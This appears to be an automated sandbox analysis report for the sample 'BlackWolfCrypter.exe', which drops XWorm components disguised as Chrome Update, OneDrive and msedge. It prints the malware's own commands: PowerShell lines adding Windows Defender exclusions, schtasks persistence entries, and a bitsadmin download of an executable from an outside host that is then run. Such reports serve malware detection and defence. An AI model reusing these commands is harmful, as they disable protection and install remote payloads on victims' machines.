Analysis
-
max time kernel
124s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system -
submitted
11-08-2024 17:55
Static task
static1
Behavioral task
behavioral1
Sample
BlackWolfCrypter.exe
Resource
win7-20240704-en
General
-
Target
BlackWolfCrypter.exe
-
Size
1.5MB
-
MD5
083482a04d9274163675e4f9c4f00f89
-
SHA1
7e0f2f644b41524fbc3b186e3ccd8a8ad5da2fc9
-
SHA256
46cc6ea931ef4279fb353b0c2f09c1c12022c18a6a1c9b2b74814412798c9f99
-
SHA512
187ef022266a2764edbbc68efc7143bf2a2e00203bdabf88393a967e55061edef3dcde39ea5c5509a2573f61bad34295336f708f8e464a6c0d9d26026aaf2ca8
-
SSDEEP
49152:QqcprvhYrYjxufFPvPRbRhq2sVC+IblsyK:QnhbV8P9rHsVC+8ls
Malware Config
Extracted
xworm
5.0
EEarXqazEvX73BCq
-
Install_directory
%AppData%
-
install_file
Chrome Update.exe
-
pastebin_url
https://pastebin.com/raw/RPPi3ByL
Signatures
-
Detect Xworm Payload 9 IoCs
Processes:
resource | yara_rule
- C:\Users\Admin\AppData\Roaming\Chrome Update.exe | family_xworm
- behavioral1/memory/2828-20-0x0000000000AE0000-0x0000000000B08000-memory.dmp | family_xworm
- C:\Users\Admin\AppData\Roaming\OneDrive.exe | family_xworm
- behavioral1/memory/2076-14-0x0000000000EA0000-0x0000000000ECC000-memory.dmp | family_xworm
- C:\Users\Admin\AppData\Roaming\msedge.exe | family_xworm
- behavioral1/memory/2776-23-0x0000000000DC0000-0x0000000000DEE000-memory.dmp | family_xworm
- behavioral1/memory/1028-2241-0x0000000000250000-0x000000000027E000-memory.dmp | family_xworm
- behavioral1/memory/2388-2243-0x00000000012B0000-0x00000000012D8000-memory.dmp | family_xworm
- behavioral1/memory/3428-2246-0x00000000003F0000-0x000000000041E000-memory.dmp | family_xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
pid | process
- 1664 | powershell.exe
- 2032 | powershell.exe
- 904 | powershell.exe
- 1596 | powershell.exe
- 2676 | powershell.exe
- 2908 | powershell.exe
- 2500 | powershell.exe
- 2128 | powershell.exe
- 2100 | powershell.exe
- 1920 | powershell.exe
- 2876 | powershell.exe
- 2860 | powershell.exe
Download via BitsAdmin 1 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Drops startup file 8 IoCs
Processes:
description | ioc | process
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe | Payload.exe
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk | Chrome Update.exe
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk | Chrome Update.exe
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk | OneDrive.exe
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk | OneDrive.exe
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk | msedge.exe
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk | msedge.exe
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe | Payload.exe
Executes dropped EXE 10 IoCs
Processes:
pid | process
- 2076 | Chrome Update.exe
- 2776 | msedge.exe
- 2828 | OneDrive.exe
- 1960 | CodeluxCrypterV3 - Cracked.exe
- 2344 | Payload.exe
- 2516 | CodeluxCrypterV3 - Cracked by Meth.exe
- 2388 | OneDrive.exe
- 1028 | msedge.exe
- 3440 | OneDrive.exe
- 3428 | msedge.exe
Loads dropped DLL 13 IoCs
Processes:
pid | process
- 1960 | CodeluxCrypterV3 - Cracked.exe (6 entries)
- 2240 | run.exe (7 entries)
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
- Set value (str) | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe" | Chrome Update.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe" | OneDrive.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CodeluxCrypterV3 - Cracked.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Modifies Internet Explorer settings
Processes:
description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
- 2236 | schtasks.exe
- 2352 | schtasks.exe
- 2020 | schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
- 2344 | Payload.exe
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
pid | process
- 2516 | CodeluxCrypterV3 - Cracked by Meth.exe
- 2908 | powershell.exe
- 2876 | powershell.exe
- 2860 | powershell.exe
- 2500 | powershell.exe
- 1664 | powershell.exe
- 2128 | powershell.exe
- 2032 | powershell.exe
- 1920 | powershell.exe
- 2100 | powershell.exe
- 904 | powershell.exe
- 1596 | powershell.exe
- 2676 | powershell.exe
- 2076 | Chrome Update.exe
- 2776 | msedge.exe
- 2828 | OneDrive.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
description | pid | process
- Token: SeDebugPrivilege | 2828 | OneDrive.exe
- Token: SeDebugPrivilege | 2076 | Chrome Update.exe
- Token: SeDebugPrivilege | 2776 | msedge.exe
- Token: SeDebugPrivilege | 2516 | CodeluxCrypterV3 - Cracked by Meth.exe
- Token: SeDebugPrivilege | 2908 | powershell.exe
- Token: SeDebugPrivilege | 2876 | powershell.exe
- Token: SeDebugPrivilege | 2860 | powershell.exe
- Token: SeDebugPrivilege | 2500 | powershell.exe
- Token: SeDebugPrivilege | 1664 | powershell.exe
- Token: SeDebugPrivilege | 2128 | powershell.exe
- Token: SeDebugPrivilege | 2032 | powershell.exe
- Token: SeDebugPrivilege | 1920 | powershell.exe
- Token: SeDebugPrivilege | 2100 | powershell.exe
- Token: SeDebugPrivilege | 904 | powershell.exe
- Token: SeDebugPrivilege | 1596 | powershell.exe
- Token: SeDebugPrivilege | 2676 | powershell.exe
- Token: SeDebugPrivilege | 2076 | Chrome Update.exe
- Token: SeDebugPrivilege | 2776 | msedge.exe
- Token: SeDebugPrivilege | 2828 | OneDrive.exe
- Token: SeDebugPrivilege | 1028 | msedge.exe
- Token: SeDebugPrivilege | 2388 | OneDrive.exe
- Token: SeDebugPrivilege | 3440 | OneDrive.exe
- Token: SeDebugPrivilege | 3428 | msedge.exe
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid | process
- 2076 | Chrome Update.exe
- 2776 | msedge.exe
- 2828 | OneDrive.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (duplicate entries collapsed, count in parentheses; 64 entries total)
- PID 2152 wrote to memory of 2076 | 2152 | BlackWolfCrypter.exe | Chrome Update.exe (3)
- PID 2152 wrote to memory of 2776 | 2152 | BlackWolfCrypter.exe | msedge.exe (3)
- PID 2152 wrote to memory of 2828 | 2152 | BlackWolfCrypter.exe | OneDrive.exe (3)
- PID 2152 wrote to memory of 2088 | 2152 | BlackWolfCrypter.exe | mshta.exe (4)
- PID 2152 wrote to memory of 1960 | 2152 | BlackWolfCrypter.exe | CodeluxCrypterV3 - Cracked.exe (7)
- PID 2088 wrote to memory of 3040 | 2088 | mshta.exe | bitsadmin.exe (4)
- PID 1960 wrote to memory of 2344 | 1960 | CodeluxCrypterV3 - Cracked.exe | Payload.exe (4)
- PID 1960 wrote to memory of 2516 | 1960 | CodeluxCrypterV3 - Cracked.exe | CodeluxCrypterV3 - Cracked by Meth.exe (4)
- PID 2776 wrote to memory of 2860 | 2776 | msedge.exe | powershell.exe (3)
- PID 2828 wrote to memory of 2876 | 2828 | OneDrive.exe | powershell.exe (3)
- PID 2076 wrote to memory of 2908 | 2076 | Chrome Update.exe | powershell.exe (3)
- PID 2776 wrote to memory of 2128 | 2776 | msedge.exe | powershell.exe (3)
- PID 2828 wrote to memory of 1664 | 2828 | OneDrive.exe | powershell.exe (3)
- PID 2076 wrote to memory of 2500 | 2076 | Chrome Update.exe | powershell.exe (3)
- PID 2828 wrote to memory of 2032 | 2828 | OneDrive.exe | powershell.exe (3)
- PID 2776 wrote to memory of 2100 | 2776 | msedge.exe | powershell.exe (3)
- PID 2076 wrote to memory of 1920 | 2076 | Chrome Update.exe | powershell.exe (3)
- PID 2828 wrote to memory of 904 | 2828 | OneDrive.exe | powershell.exe (3)
- PID 2076 wrote to memory of 1596 | 2076 | Chrome Update.exe | powershell.exe (2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BlackWolfCrypter.exe (depth 1)
"C:\Users\Admin\AppData\Local\Temp\BlackWolfCrypter.exe"
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Roaming\Chrome Update.exe (depth 2)
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\System32\schtasks.exe (depth 3)
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
- Scheduled Task/Job: Scheduled Task
PID:2236 -
C:\Users\Admin\AppData\Roaming\msedge.exe (depth 2)
"C:\Users\Admin\AppData\Roaming\msedge.exe"
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676 -
C:\Windows\System32\schtasks.exe (depth 3)
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
- Scheduled Task/Job: Scheduled Task
PID:2020 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe (depth 2)
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904 -
C:\Windows\System32\schtasks.exe (depth 3)
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
- Scheduled Task/Job: Scheduled Task
PID:2352 -
C:\Windows\SysWOW64\mshta.exe (depth 2)
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\bitsadmin.exe (depth 3)
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/uNoP8413-run.exe C:\Users\Admin\AppData\Local\Temp\run.exe
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\run.exe (depth 3)
"C:\Users\Admin\AppData\Local\Temp\run.exe"
PID:1088
-
C:\Users\Admin\AppData\Local\Temp\run.exe (depth 4)
"C:\Users\Admin\AppData\Local\Temp\run.exe"
- Loads dropped DLL
PID:2240 -
C:\Users\Admin\AppData\Roaming\CodeluxCrypterV3 - Cracked.exe (depth 2)
"C:\Users\Admin\AppData\Roaming\CodeluxCrypterV3 - Cracked.exe"
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\Payload.exe (depth 3)
"C:\Users\Admin\AppData\Local\Temp\Payload.exe"
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\CodeluxCrypterV3 - Cracked by Meth.exe (depth 3)
"C:\Users\Admin\AppData\Local\Temp\CodeluxCrypterV3 - Cracked by Meth.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
C:\Windows\system32\taskeng.exe (depth 1)
taskeng.exe {E9FA8600-AE0B-4EEE-8F42-AAE3E92AFB45} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
PID:1956
-
C:\Users\Admin\AppData\Local\msedge.exe (depth 2)
C:\Users\Admin\AppData\Local\msedge.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\ProgramData\OneDrive.exe (depth 2)
C:\ProgramData\OneDrive.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Users\Admin\AppData\Local\msedge.exe (depth 2)
C:\Users\Admin\AppData\Local\msedge.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3428 -
C:\ProgramData\OneDrive.exe (depth 2)
C:\ProgramData\OneDrive.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3440
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- BITS Jobs (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads